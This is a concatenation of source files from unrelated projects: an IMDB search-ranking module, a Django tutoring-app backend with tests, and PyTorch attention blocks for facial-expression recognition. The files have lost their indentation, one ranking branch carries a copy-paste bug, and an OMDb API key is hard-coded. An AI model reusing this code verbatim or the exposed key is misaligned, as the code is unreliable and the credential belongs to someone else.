self.ix_to_doc = {ix: doc for doc, ix in self.doc_to_ix.items()}
def docs2feature(self, index: str):
"""
"""
# build the document-by-word frequency matrix from the inverted index
doc2wordfreq = [[0] * len(self.word_to_ix)
for _ in range(len(self.doc_to_ix))]
for wd, docDict in self.index2docs[index].items():
for did, freq in docDict.items():
x = self.doc_to_ix[did]
y = self.word_to_ix[wd]
doc2wordfreq[x][y] = freq
self.doc2vecs[index] = doc2wordfreq
def docs2position(self, index: str):
# positions default to [-1]; a real occurrence overwrites the whole position list
word_doc_post = [[[-1] for __ in range(
len(self.doc_to_ix))] for ___ in range(len(self.word_to_ix))]
for wd in self.word_to_ix.keys():
for doc in self.doc_to_ix.keys():
if wd not in self.index2docs[index]:
continue
if doc not in self.index2docs[index][wd]:
continue
word_doc_post[self.word_to_ix[wd]][self.doc_to_ix[
doc]] = self.index2docs[index][wd][doc]
self.doc2vecs[index] = word_doc_post
def alignment(self, word_doc_post)->Dict:
# N = len(self.word_to_ix) # word
# M = len(self.doc_to_ix) # doc
def comb(place1, place2, coda=' '):
return [str(p1) + coda + str(p2) for p1 in place1 for p2 in place2]
# scoring: compute the score directly from the word positions
docs_score = [0] * len(self.doc_to_ix) # {}
baseline = np.array([i + 1 for i in range(len(self.qwords))]) # 1 by N
for doc in self.doc_to_ix.keys():
j = self.doc_to_ix[doc]
places = [word_doc_post[self.word_to_ix[w]][j]
for w in self.qwords]
vectors = reduce(comb, places) # length = H
comb_to_plcs = np.array([list(map(int, vec.split()))
for vec in vectors]) # H by N
scores = np.dot(baseline, comb_to_plcs.T) # 1 by H
docs_score[j] = np.max(scores) # softmax(scores)) # 1
mean = sum(docs_score) / len(self.doc_to_ix)
diff = max(docs_score) - min(docs_score)
docs_to_score = {doc: (
docs_score[self.doc_to_ix[doc]] - mean + 1) / (diff + 1) for doc in self.doc_to_ix.keys()}
return docs_to_score
def freqRanking(self, index: str):
self.docs2feature(index)
freqs = [0 for _ in range(len(self.doc_to_ix))]
for ix, vals in enumerate(self.doc2vecs[index]):
freqs[ix] = sum(vals) / len(vals)
mean = sum(freqs) / len(freqs)
diff = max(freqs) - min(freqs)
scores = [(f - mean + 1) / (diff + 1) for f in freqs]
for ix, s in enumerate(scores):
self.docs2score[self.ix_to_doc[ix]].append(s)
def invertRanking(self, index: str):
self.docs2feature(index)
tfidf = TfidfTransformer()
tfidfmat = tfidf.fit_transform(self.doc2vecs[index])
for ix, vec in enumerate(tfidfmat.toarray()):
if np.square(vec).sum() != 0:
score = np.sum(vec) / np.square(vec).sum()
else:
score = 0
self.docs2score[self.ix_to_doc[ix]].append(score)
def positionRanking(self, index: str):
self.docs2position(index)
docs_score = self.alignment(self.doc2vecs[index])
for did in self.doc_to_ix:
self.docs2score[did].append(docs_score[did])
def ranking(self)->List:
""" The core of this class!
0. turn the retrieval results into feature vectors
1. compute a score for each feature
2. compute the weighted sum of the scores
3. sort the documents
"""
# document -> list of per-feature scores
self.docs2score = defaultdict(list)
index_names = []
if len(self.qwords) > 1:
if 'freq-plot' in self.index_ids:
self.invertRanking('freq-plot')
index_names.append('freq-plot')
if 'freq-script' in self.index_ids:
self.invertRanking('freq-script')
index_names.append('freq-script')
if 'post-plot' in self.index_ids:
self.positionRanking('post-plot')
index_names.append('post-plot')
if 'post-plot' in self.index_ids:
self.positionRanking('post-script')
index_names.append('post-script')
else:
if 'freq-plot' in self.index_ids:
self.freqRanking('freq-plot')
index_names.append('freq-plot')
if 'freq-script' in self.index_ids:
self.freqRanking('freq-script')
index_names.append('freq-script')
# 2. combine the per-feature scores into a final score
scoring = []
ranking = []
for doc, scores in self.docs2score.items():
ranking.append(doc)
scoring.append(getFinalScore(scores, index_names))
# 3. sort by the final score
inds = np.argsort(scoring)
ranking = np.array(ranking)
ranking = ranking[inds]
return ranking[::-1]
def getDocs(self, docIDs: List)->List:
"""
get the original docs from database
docsIDs: the docs id that need to obtain from database
"""
        # Optionally limit the maximum number of documents retrieved
nums = len(docIDs)
if self.limit_docs is not None and nums > self.limit_docs:
nums = self.limit_docs
LOCAL_URL = "mongodb+srv://jack:<EMAIL>"
mc = MongoClient(LOCAL_URL)
db = mc['IMDBData']
c = db['Movies']
docs = [c.find_one({'imdbID': docIDs[i]}) for i in range(nums)]
return [d for d in docs if d is not None]
def output(self)->List:
"""
return the original docs
"""
docs = []
        # 1. Check that the input is valid
if self.precheck() is False:
return docs
        # 2. Rank the documents
docIDs = self.ranking()
        # Fetch the corresponding documents
docs = self.getDocs(docIDs)
return docs
```
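The `alignment` method above scores each document by enumerating every combination of the query words' candidate positions and keeping the best dot product against an increasing baseline. A standalone sketch of that idea, using made-up positions instead of the index structures above:
```python
from functools import reduce
import numpy as np

def comb(place1, place2, coda=' '):
    # pair up every candidate position of one word with every position of the next
    return [str(p1) + coda + str(p2) for p1 in place1 for p2 in place2]

# hypothetical positions of three query words inside one document (-1 = not present)
places = [[2, 10], [3], [-1, 11]]
vectors = reduce(comb, places)                                   # all position combinations
matrix = np.array([list(map(int, v.split())) for v in vectors])  # H by N
baseline = np.array([1, 2, 3])                                   # rewards later query words at later positions
print(np.max(matrix @ baseline))                                 # score of the best-aligned combination
```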
#### File: backend/storeData/ImdbToMongodb.py
```python
import requests
import pymongo
import pandas as pd
# key: fe53f97e
class ImdbToMongoDB:
def __init__(self, key):
self.url = "http://www.omdbapi.com/?apikey=" + key + "&i="
self.client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
def readMovieFile(self, num):
df = pd.read_csv("movieFragments/movieData" + str(num) + ".csv")
return df['tconst'].values.tolist()
def imdbAPI(self, id):
return requests.get(self.url + id + "&plot=full").json()
def sendToMongoDB(self):
db = self.client['IMDBData']
collection = db['Movies']
movie = self.imdbAPI("tt1431045")
collection.insert_one(movie)
# for i in range(35000, 207581, 5000):
# print("------------------------------------")
# print("I am sending the movieData" + str(i) + ".csv file")
# movieIDList = self.readMovieFile(i)
# count = 0
# movies = []
# for id in movieIDList:
# try:
# movie = self.imdbAPI(id)
# movies.append(movie)
# if count % 1000 == 0:
# print(count)
# count = count + 1
# except:
# print("This id:" + id + " results problem.")
#
# collection.insert_many(movies)
# test = ImdbToMongoDB("fe53f97e")
# test.sendToMongoDB()
``` |
{
"source": "2019-swpp-8/swpp",
"score": 2
} |
#### File: swpp/migrations/0011_load_initial_data.py
```python
from django.db import migrations
from django.core.management import call_command
fixture = 'initial_data'
def load_fixture(apps, schema_editor):
unload_fixture(apps, schema_editor)
call_command('loaddata', fixture, app_label='swpp')
def unload_fixture(apps, schema_editor):
lecture = apps.get_model('swpp', 'lecture')
lecture.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('swpp', '0010_profile_name'),
]
operations = [
migrations.RunPython(load_fixture, reverse_code = unload_fixture)
]
```
#### File: swpp/model/times.py
```python
from django.db import models
from annoying.fields import AutoOneToOneField
class Times(models.Model):
mon = models.BigIntegerField(default = 0)
tue = models.BigIntegerField(default = 0)
wed = models.BigIntegerField(default = 0)
thu = models.BigIntegerField(default = 0)
fri = models.BigIntegerField(default = 0)
sat = models.BigIntegerField(default = 0)
sun = models.BigIntegerField(default = 0)
# other is Times
def flip(self, other):
self.mon ^= other.mon
self.tue ^= other.tue
self.wed ^= other.wed
self.thu ^= other.thu
self.fri ^= other.fri
self.sat ^= other.sat
self.sun ^= other.sun
# other is TimesSerializer
# minInterval, total: 1 per 30 min. ex) 4 = 2 hrs
def isAvailable(self, other, minInterval, total):
mon = self.mon & other.data['mon']
tue = self.tue & other.data['tue']
wed = self.wed & other.data['wed']
thu = self.thu & other.data['thu']
fri = self.fri & other.data['fri']
sat = self.sat & other.data['sat']
sun = self.sun & other.data['sun']
available = 0
for time in (mon, tue, wed, thu, fri, sat, sun):
combo = 0
while time:
if time & 1: combo += 1
else:
if combo >= minInterval: available += combo
combo = 0
time >>= 1
if combo >= minInterval: available += combo
return available >= total
```
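`isAvailable` above works on per-day bitmasks where each set bit is a free 30-minute slot; it counts only slots that sit in a run of at least `minInterval` consecutive free slots. A minimal standalone sketch of that scan on a plain integer (no Django involved):
```python
def available_slots(time_mask: int, min_interval: int) -> int:
    # count free slots that belong to a run of at least min_interval consecutive free slots
    available = combo = 0
    while time_mask:
        if time_mask & 1:
            combo += 1
        else:
            if combo >= min_interval:
                available += combo
            combo = 0
        time_mask >>= 1
    if combo >= min_interval:
        available += combo
    return available

# runs of 4 and 3 free slots; with min_interval=3 both count, giving 7 slots (3.5 hours)
print(available_slots(0b111011110, 3))
```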
#### File: backend/swpp/tests.py
```python
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.test import APITestCase, APITransactionTestCase
from swpp.apps import SwppConfig
from datetime import datetime, timezone, timedelta
from rest_framework import serializers, status
from swpp.serializers import *
from django.core import mail
from django.utils.encoding import smart_text
import re
class LowLevelTests(APITestCase):
def create_user(self, username, password):
return self.User.objects.create_user(username, password)
def setUp(self):
self.User = get_user_model()
def test_sanity(self):
self.assertTrue(True)
def test_app_name(self):
self.assertEqual(SwppConfig.name, 'swpp')
def test_user_profile_relation(self):
user = self.create_user('t', '1')
self.assertTrue(hasattr(user, 'profile'))
self.assertTrue(hasattr(user.profile, 'user'))
self.assertEqual(user, user.profile.user)
def test_profile_joined_time(self):
from_time = datetime.now(timezone.utc) - timedelta(seconds = 1)
user = self.create_user('t', '1')
to_time = datetime.now(timezone.utc) + timedelta(seconds = 1)
self.assertTrue(user.profile.joined >= from_time)
self.assertTrue(user.profile.joined <= to_time)
def test_user_profile_tutor_relation(self):
user = self.create_user('t', '1')
self.assertTrue(hasattr(user, 'profile'))
self.assertTrue(hasattr(user.profile, 'user'))
self.assertEqual(user, user.profile.user)
self.assertTrue(hasattr(user.profile, 'tutor'))
self.assertTrue(hasattr(user.profile.tutor, 'profile'))
self.assertEqual(user.profile, user.profile.tutor.profile)
# added 05/01, from modelInit branch
def test_valid_profile(self):
user = self.create_user('s', '2')
data = {'major': '', 'contact': '010-1111-1111', 'name': 'test'}
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertFalse(serializer.is_valid())
data['major'] = 'bio'
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertTrue(serializer.is_valid())
serializer.save()
data['contact'] = '010-11111-1111'
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertFalse(serializer.is_valid())
def test_valid_times(self):
user = self.create_user('q', '3')
self.assertEqual(user.profile.tutor.times.mon, 0)
data = {'mon': 1 << 48, 'tue': (1 << 48) - 1, 'wed': 1 << 47,
'thu': 1, 'fri': 0, 'sat': -1, 'sun': -(1 << 48) + 1}
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['mon'] = 1
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['sat'] = 3
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['sun'] = 72698241236
serializer = TimesSerializer(data = data)
self.assertTrue(serializer.is_valid())
serializer.save()
self.assertEqual(serializer.data['sat'], 3)
def test_prof_put(self):
user = self.create_user('profPutTestID', 'profPutTestPW')
url = '/profile/{0}/'.format(user.id)
data = {'major': 'cse', 'contact': '010-1234-5678'}
response = self.client.put(url, data)
self.assertTrue(response.status_code >= 400)
self.client.force_login(user)
self.client.get("/users/")
before = self.client.get(url).data
# self.client.force_authenticate(user=user)
self.client.put(url, data)
after = self.client.get(url).data
self.assertEqual(before["major"], "")
self.assertEqual(before["contact"], "010-0000-0000")
self.assertEqual(after["major"], "cse")
self.assertEqual(after["contact"], "010-1234-5678")
response = self.client.put(url, {'contact':'0'})
self.assertTrue(response.status_code >= 400)
def test_prof_contact_permission(self):
user1 = self.create_user('user1', 'user1')
user2 = self.create_user('user2', 'user2')
url = '/profiles/'
url1 = '/profile/{0}/'.format(user1.id)
url2 = '/profile/{0}/'.format(user2.id)
self.client.get('/users/')
self.client.force_login(user1)
prof_list1 = self.client.get(url).data
prof1 = self.client.get(url1).data
prof2 = self.client.get(url2).data
self.assertEqual(prof1['contact'], "010-0000-0000")
self.assertEqual(prof2['contact'], "")
self.assertEqual(prof_list1[0]['contact'], "010-0000-0000")
self.assertEqual(prof_list1[1]['contact'], "")
# added 05/05, from tutor_put_request branch
def test_tutor_put(self):
user = self.create_user('iidd', 'ppww')
#login = self.client.login(username = 'iidd', password = '<PASSWORD>')
#self.assertTrue(login)
tutorid = "/tutor/{0}/".format(user.id)
data = {'bio': 'hi', 'exp': 'A'}
response = self.client.put(tutorid, data)
self.assertTrue(status.is_client_error(response.status_code))
self.client.force_login(user)
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
prev = self.client.get(tutorid).data
self.client.put(tutorid, data)
curr = self.client.get(tutorid).data
self.assertEqual(prev['bio'], "")
self.assertEqual(curr['bio'], "hi")
self.assertEqual(prev['exp'], "")
self.assertEqual(curr['exp'], "A")
# added 05/17, from tutor_search_filter branch
# added 05/30, from search_tutor_with_lecture branch
def test_tutor_filter(self):
user = self.create_user('iidd', 'ppww')
data = {'bio': 'my bio', 'exp': 'MY EXP'}
prof = {'major': 'my major'}
other_user = self.create_user('idother', 'pwother')
other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'}
other_prof = {'major': 'your major'}
korean_user = self.create_user('idkorean', 'pwkorean')
korean_data = {'bio': '자기소개', 'exp': '경력'}
korean_prof = {'major': '전공'}
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), data)
self.client.put("/profile/{0}/".format(user.id), prof)
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), other_data)
self.client.put("/profile/{0}/".format(other_user.id), other_prof)
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), korean_data)
self.client.put("/profile/{0}/".format(korean_user.id), korean_prof)
tutors = self.client.get("/tutors/").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?bio=bi&exp=ex").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/", {'bio': '소개', 'exp': '경'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], korean_user.id)
tutors = self.client.get("/tutors/", {'bio': 'ur b'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
tutors = self.client.get("/tutors/?major=major").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/", {'major': '전'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], korean_user.id)
# check for times
times1 = {'mon': 0x3DC0, #0b0011110111000000
'tue': 0xD4F0, #0b1101010011110000
'wed': 0x0,
'thu': 0x0,
'fri': 0x0,
'sat': 0x0,
'sun': 0x0} # total 7.5hr
times2 = {'mon': 0x0,
'tue': 0x99D0, #0b1001100111010000
'wed': 0xFC7C, #0b1111110001111100
'thu': 0x0,
'fri': 0x0,
'sat': 0x0,
'sun': 0x0} # total 9hr
times3 = {'mon': 0xFFFF, #0b1111111111111111
'tue': 0xFFFF, #0b1111111111111111
'wed': 0xFFFF, #0b1111111111111111
'thu': 0xFFFF, #0b1111111111111111
'fri': 0x0,
'sat': 0x0,
'sun': 0x0,
'total': 15}
self.client.force_login(user)
self.client.put("/times/{0}/".format(user.profile.tutor.times.id), times1)
self.client.force_login(other_user)
self.client.put("/times/{0}/".format(other_user.profile.tutor.times.id), times2)
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 2)
times3['total'] = 18
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
times3['total'] = 12
times3['minInterval'] = 3
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
times3['total'] = 15
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 0)
times3['wed'] = 0
times3['total'] = 6
times3['minInterval'] = 2
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], user.id)
times3['mon'] = 0xF3E0 #0b1111001111100000
times3['total'] = 7
times3['minInterval'] = 3
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], user.id)
times3['total'] = 8
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 0)
# check for lectures
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), {'lectures': [2, 4, 6]})
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), {'lectures': [1, 2, 3, 4]})
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), {'lectures': [4, 5]})
tutors = self.client.get("/tutors/?lecture=4").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?lecture=2").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/?lecture=1").data
self.assertEqual(len(tutors), 1)
tutors = self.client.get("/tutors/?lecture=7").data
self.assertEqual(len(tutors), 0)
tutors = self.client.get("/tutors/?lecTitle=글쓰기").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?lecProf=허윤").data
self.assertEqual(len(tutors), 2)
def test_tutor_list_ordering(self):
user = self.create_user('iidd', 'ppww')
data = {'bio': 'my bio', 'exp': 'MY EXP'}
prof = {'major': 'my major', 'name':'나나나'}
other_user = self.create_user('idother', 'pwother')
other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'}
other_prof = {'major': 'your major', 'name':'다다다'}
korean_user = self.create_user('idkorean', 'pwkorean')
korean_data = {'bio': '자기소개', 'exp': '경력'}
korean_prof = {'major': '전공', 'name':'가가가'}
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), data)
self.client.put("/profile/{0}/".format(user.id), prof)
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), other_data)
self.client.put("/profile/{0}/".format(other_user.id), other_prof)
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), korean_data)
self.client.put("/profile/{0}/".format(korean_user.id), korean_prof)
tutors = self.client.get("/tutors/").data
self.assertEqual(tutors[0]['profile']['name'], "가가가")
self.assertEqual(tutors[1]['profile']['name'], "나나나")
self.assertEqual(tutors[2]['profile']['name'], "다다다")
def test_lectures_database(self):
lectures = self.client.get("/lectures/").data
self.assertEqual(len(lectures), 30214)
lecture = {'title': '궰쇆뮶'}
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 0)
lecture = {'prof': '문병로'}
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 5)
lecture['title'] = '알고'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 3)
del lecture['prof']
lecture['title'] = '대학 글쓰기 1'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 35)
lecture['prof'] = '나민애'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 1)
lecture['prof'] = '문병로'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 0)
def test_request(self):
user1 = self.create_user('id1', 'pw2')
user2 = self.create_user('id3', 'pw4')
self.client.get("/users/").data
self.client.get("/profiles/").data
self.client.get("/tutors/").data
self.client.force_login(user2)
request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b",
'mon': 1, 'tue': 2, 'wed': 1, 'thu': 2, 'fri': 1, 'sat': 2, 'sun': 0}
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
times = {'mon': 7,
'tue': 7,
'wed': 7,
'thu': 7,
'fri': 7,
'sat': 7,
'sun': 7}
times_id = user1.profile.tutor.times.id
tutoringTimes_id = user1.profile.tutor.tutoringTimes.id
self.client.put("/times/{0}/".format(times_id), times)
self.client.post("/requests/", request)
request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b",
'mon': 4, 'tue': 0, 'wed': 2, 'thu': 1, 'fri': 0, 'sat': 0, 'sun': 7}
self.client.post("/requests/", request)
self.client.delete("/request/2/")
self.client.post("/requests/", request)
self.client.force_login(user1)
self.client.delete("/request/3/")
self.client.force_login(user2)
requests = self.client.get("/requests/").data
self.assertEqual(len(requests), 1)
request['sun'] = 8
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
request['sun'] = 0
request['tutee'] = 1
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
self.assertEqual(requests[0]['times']['mon'], 1)
self.assertEqual(requests[0]['times']['sat'], 2)
request = self.client.get("/request/1/").data
self.assertEqual(request['status'], 0)
prof = self.client.get('/profile/{0}/'.format(user1.id)).data
self.assertEqual(prof['contact'], "")
self.client.force_login(user1)
request = self.client.put("/request/1/", {'status': 1}).data
self.assertEqual(request['status'], 1)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['mon'], 6)
self.assertEqual(request['sun'], 7)
request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data
self.assertEqual(request['sat'], 2)
self.assertEqual(request['sun'], 0)
times['mon'] = 15
times['tutor'] = user1.id
self.assertTrue(self.client.put('/times/{0}/'.format(times_id), times).status_code >= 400)
prof = self.client.get('/profile/{0}/'.format(user1.id)).data
self.assertEqual(prof['contact'], "010-0000-0000")
self.client.force_login(user1)
prof = self.client.get('/profile/{0}/'.format(user2.id)).data
self.assertEqual(prof['contact'], "010-0000-0000")
self.assertEqual(len(prof['notifications']), 2)
self.assertFalse(prof['notifications'][0]['read'])
notification = self.client.get('/notification/{0}/'.format(prof['notifications'][0]['id'])).data
self.assertTrue(notification['read'])
self.assertTrue(self.client.get('/notification/9999/').status_code == 404)
request = self.client.put("/request/1/", {'status': 2}).data
self.assertEqual(request['status'], 2)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['tue'], 7)
request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data
self.assertEqual(request['wed'], 0)
self.assertEqual(request['sun'], 0)
self.client.put('/times/{0}/'.format(times_id), times)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['mon'], 15)
prof = self.client.get('/profile/{0}/'.format(user2.id)).data
self.assertEqual(prof['contact'], "")
class HighLevelTests(APITransactionTestCase):
def setUp(self):
self.User = get_user_model()
self.verify_url_matcher = re.compile(r'(\/auth\/activate\/[0-9a-f]+\/)')
def register(self, username, email, passwd):
return self.client.post('/auth/register/', {
'username': username,
'email': email,
'password1': <PASSWORD>,
'password2': <PASSWORD>
})
def verify_email(self, email):
resp = None
for msg in mail.outbox:
if len(msg.to) == 1 and msg.to[0] == email:
url = self.verify_url_matcher.search(msg.body)
self.assertIsNot(url, None)
resp = self.client.get(url.group())
return resp
# Naming scheme: foo_s: expect success, foo_f: expect failure
def register_s(self, username, email, passwd):
resp = self.register(username, email, passwd)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, '/auth/register/complete/')
ver = self.verify_email(email)
self.assertIsNot(ver, None)
self.assertEqual(ver.status_code, 302)
self.assertEqual(ver.url, '/auth/activate/complete/')
def register_f(self, username, email, passwd):
failed = False
resp = self.register(username, email, passwd)
if resp.status_code != 302:
failed = True
ver = self.verify_email(email)
if ver is None or ver.status_code != 302:
failed = True
        # If we got this far without a failure, something is wrong!
self.assertTrue(failed)
def test_registration(self):
        # Email is not an SNU address
self.register_f('testuser0', '<EMAIL>', '9328h9ih!sdf')
# OK
self.register_s('testuser0', '<EMAIL>', 'A!98uk_48ohD')
        # Duplicate email
self.register_f('dup_email', '<EMAIL>', 'v09#oijsad#S')
        # Duplicate username
self.register_f('testuser0', '<EMAIL>', '0iDSAF2^49oj')
# OK
self.register_s('testuser1', '<EMAIL>', '(oir!eLI+Esd')
        # Weak password
self.register_f('testuser2', '<EMAIL>', 'password')
def test_user_current(self):
un = 'test'
        pw = '<PASSWORD>'
me = self.client.get('/user/current/')
self.assertTrue(status.is_client_error(me.status_code))
self.register_s('test', '<EMAIL>', pw)
self.client.login(username=un, password=pw)
me = self.client.get('/user/current/')
self.assertTrue(status.is_success(me.status_code))
self.assertEqual(me.data['username'], un)
```
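Each set bit in the `times1` and `times2` masks above is one 30-minute slot, so the hour totals noted in the comments can be verified with a quick bit count (a standalone check, not part of the test suite):
```python
slots1 = bin(0x3DC0).count('1') + bin(0xD4F0).count('1')  # mon + tue of times1
slots2 = bin(0x99D0).count('1') + bin(0xFC7C).count('1')  # tue + wed of times2
print(slots1 * 0.5, slots2 * 0.5)  # 7.5 and 9.0 hours
```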
#### File: swpp/view/times.py
```python
from django.shortcuts import render
from swpp.models import Times, Tutor
from swpp.serializers import TimesSerializer
from rest_framework import generics, mixins
from rest_framework.response import Response
class TimesList(generics.ListAPIView):
queryset = Times.objects.all()
serializer_class = TimesSerializer
class TimesDetails(generics.RetrieveUpdateDestroyAPIView):
queryset = Times.objects.all()
serializer_class = TimesSerializer
def put(self, request, *args, **kwargs):
times = Times.objects.get(pk = kwargs['pk'])
context = {}
if 'tutor' in request.POST:
context['tutoringTimes'] = Tutor.objects.get(pk = request.data.get('tutor')).tutoringTimes
serializer = TimesSerializer(times, data=request.data, context=context)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=400)
# return self.update(request, *args, **kwargs)
``` |
{
"source": "2019ZSS/FER",
"score": 3
} |
#### File: FER/models/at.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class NonLocalBlock(nn.Module):
def __init__(self, in_channels: int):
super(NonLocalBlock, self).__init__()
self.inter_channel = in_channels // 2
self.conv_phi = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_theta = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_g = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_mask = nn.Conv2d(in_channels=self.inter_channel, out_channels=in_channels,
kernel_size=1, stride=1, padding=0, bias=False)
def forward(self, x):
# [B, C, H, W]
b, c, h, w = x.size()
        # [B, C/2, H * W] -- the 1x1 convolutions output inter_channel (= C/2) channels
        x_phi = self.conv_phi(x).view(b, self.inter_channel, -1)
        # [B, H * W, C/2]
        x_theta = self.conv_theta(x).view(b, self.inter_channel, -1).permute(0, 2, 1).contiguous()
        x_g = self.conv_g(x).view(b, self.inter_channel, -1).permute(0, 2, 1).contiguous()
# [B, H * W, H * W]
mul_theta_phi = F.softmax(torch.matmul(x_theta, x_phi), dim=1)
# [B, H*W, C / 2]
mul_theta_phi_g = torch.matmul(mul_theta_phi, x_g)
# [B, C / 2, H, w]
mul_theta_phi_g = mul_theta_phi_g.permute(0,2,1).contiguous().view(b, self.inter_channel, h, w)
# [B, C, H , W]
mask = self.conv_mask(mul_theta_phi_g)
out = mask + x
return out
class ContextBlock(nn.Module):
'''
Global Context Network(GCNet)
Paper: Global Context Network(GCNet)
Code: https://github.com/xvjiarui/GCNet
Analysis: https://blog.csdn.net/sinat_17456165/article/details/106760606
'''
def __init__(self, inplanes, ratio=1.0/16, pooling_type='att', fusion_types=('channel_add', )):
super(ContextBlock, self).__init__()
valid_fusion_types = ['channel_add', 'channel_mul']
assert pooling_type in ['avg', 'att']
assert isinstance(fusion_types, (list, tuple))
assert all([f in valid_fusion_types for f in fusion_types])
assert len(fusion_types) > 0, 'at least one fusion should be used'
self.inplanes = inplanes
self.ratio = ratio
self.planes = int(inplanes * ratio)
self.pooling_type = pooling_type
self.fusion_types = fusion_types
if pooling_type == 'att':
self.conv_mask = nn.Conv2d(inplanes, 1, kernel_size=1)
self.softmax = nn.Softmax(dim=2)
else:
self.avg_pool = nn.AdaptiveAvgPool2d(1)
if 'channel_add' in fusion_types:
self.channel_add_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True), # yapf: disable
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
else:
self.channel_add_conv = None
if 'channel_mul' in fusion_types:
self.channel_mul_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True), # yapf: disable
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
else:
self.channel_mul_conv = None
def spatial_pool(self, x):
batch, channel, height, width = x.size()
if self.pooling_type == 'att':
input_x = x
# [N, C, H * W]
input_x = input_x.view(batch, channel, height * width)
# [N, 1, C, H * W]
input_x = input_x.unsqueeze(1)
# [N, 1, H, W]
context_mask = self.conv_mask(x)
# [N, 1, H * W]
context_mask = context_mask.view(batch, 1, height * width)
# [N, 1, H * W]
context_mask = self.softmax(context_mask)
# [N, 1, H * W, 1]
context_mask = context_mask.unsqueeze(-1)
# [N, 1, C, 1]
context = torch.matmul(input_x, context_mask)
# [N, C, 1, 1]
context = context.view(batch, channel, 1, 1)
else:
# [N, C, 1, 1]
context = self.avg_pool(x)
return context
def forward(self, x):
# [N, C, 1, 1]
context = self.spatial_pool(x)
out = x
if self.channel_mul_conv is not None:
# [N, C, 1, 1]
channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))
out = out * channel_mul_term
if self.channel_add_conv is not None:
# [N, C, 1, 1]
channel_add_term = self.channel_add_conv(context)
out = out + channel_add_term
return out
class PyramidPooling(nn.Module):
"""
Reference:
Zhao, Hengshuang, et al. *"Pyramid scene parsing network."*
"""
def __init__(self, in_channels, norm_layer, up_kwargs):
